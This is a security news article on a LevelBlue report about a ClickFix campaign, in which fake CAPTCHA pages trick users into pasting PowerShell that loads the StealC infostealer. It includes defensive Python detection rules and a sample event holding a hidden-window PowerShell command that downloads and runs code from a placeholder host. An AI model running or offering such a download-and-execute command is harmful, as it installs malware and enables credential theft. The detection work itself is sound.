The compromised website loads a malicious script | Image: LevelBlue
A new report from LevelBlue dissects a sophisticated multi-stage malware campaign that turns a routine security check into a point of infection. The campaign, which deploys the StealC information stealer, relies on a “ClickFix” social engineering tactic that tricks users into executing malicious code under the guise of proving they are human.
The attack is notable for its use of “fileless” execution, meaning the malware runs almost entirely in memory, leaving little trace on the victim’s hard drive for traditional antivirus tools to find.
The infection begins when a user visits a compromised website—in one observed case, a Vietnamese restaurant’s page—that has been injected with malicious JavaScript. This script redirects the user to a fake CAPTCHA page that mimics a Cloudflare security check.
Instead of clicking images of traffic lights, the user is given a set of technical instructions:
- Press Windows Key + R to open the Run dialog.
- Press Ctrl + V to paste a command.
- Press Enter.
“The ClickFix technique exploits user trust. Users believe they’re completing a legitimate verification step and do not realize they are executing malware,” the report explains.
The command they paste is a malicious PowerShell script that triggers the infection chain. “The use of keyboard shortcuts (Win+R, Ctrl+V) makes the process feel technical and legitimate,” effectively bypassing user suspicion.
Once the user hits Enter, the malware executes a series of “fileless” stages designed to evade detection.
- Stage 1: A PowerShell loader downloads shellcode directly into memory.
- Stage 2: A position-independent shellcode loader (generated by the Donut framework) prepares the system.
- Stage 3: A PE downloader injects the final payload into a legitimate Windows process, svchost.exe.
“All stages except the final payload operate in memory, defeating disk-based scanning and leaving minimal forensic artifacts,” the report notes. By hiding inside svchost.exe, the malware operates “under the trust of a Windows service, evading application whitelisting and behavioral analysis”.
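The Run-dialog launch described above leaves a distinctive process-creation pattern: PowerShell spawned directly by explorer.exe with a hidden window and an in-memory download. The following detection logic is an added example, not code from the LevelBlue report; it runs over constructed Sysmon Event ID 1-style records (ParentImage, Image, CommandLine), and the URL in the sample is a placeholder.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    """Subset of a Sysmon Event ID 1 (process creation) record."""
    parent_image: str
    image: str
    command_line: str

# Command-line traits of an in-memory loader pasted into the Run dialog.
INDICATORS = {
    "hidden_window": re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I),
    "encoded_command": re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "remote_fetch": re.compile(r"downloadstring|invoke-webrequest|\biwr\b|net\.webclient|invoke-restmethod", re.I),
    "in_memory_exec": re.compile(r"\biex\b|invoke-expression", re.I),
}

def indicator_hits(ev: ProcEvent) -> list[str]:
    """Return the names of all ClickFix traits present in one event."""
    hits = []
    # The Run dialog is hosted by explorer.exe, so a pasted command
    # shows up as PowerShell spawned directly by the shell.
    parent, image = ev.parent_image.lower(), ev.image.lower()
    if parent.endswith("\\explorer.exe") and image.endswith(("\\powershell.exe", "\\pwsh.exe")):
        hits.append("run_dialog_powershell")
    for name, rx in INDICATORS.items():
        if rx.search(ev.command_line):
            hits.append(name)
    return hits

def is_clickfix_candidate(ev: ProcEvent) -> bool:
    """Flag explorer.exe -> PowerShell launches carrying at least two loader traits."""
    hits = indicator_hits(ev)
    return "run_dialog_powershell" in hits and len(hits) >= 3

# Constructed sample events (not taken from the report); example.invalid is a placeholder.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", PS,
              "powershell -w hidden -ep bypass -c \"iex (New-Object Net.WebClient).DownloadString('http://example.invalid/x')\""),
    ProcEvent(r"C:\Windows\System32\cmd.exe", PS, "powershell Get-Process"),   # ordinary admin use
    ProcEvent(r"C:\Windows\explorer.exe", PS, "powershell"),                   # user opened a shell via Run
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(is_clickfix_candidate(ev), indicator_hits(ev))
```

Only the first sample trips the rule; a bare PowerShell launch from the Run dialog is recorded as a single weak hit so that legitimate use is not flagged on its own.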
The final payload is StealC, a powerful “Malware-as-a-Service” tool designed to harvest a vast amount of sensitive data. It targets:
- Browser Data: Passwords, cookies, and credit card info from over a dozen browsers.
- Crypto Wallets: Private keys and seed phrases from over 50 browser extensions and desktop wallets like MetaMask and Exodus.
- System Info: Detailed hardware profiles and screenshots.
The stolen data is exfiltrated to a Command and Control (C2) server using RC4-encrypted HTTP traffic, making it difficult for network defenders to spot the theft in progress.
The report concludes that this campaign represents a significant evolution in commodity malware. “The use of social engineering (ClickFix), fileless execution, reflective loading, and encrypted C2 communication creates a formidable threat that evades traditional security controls,” LevelBlue researchers warn.
For organizations, the lesson is clear: “Social Engineering Remains the Weakest Link… Security awareness training must address fake CAPTCHA and verification prompts”.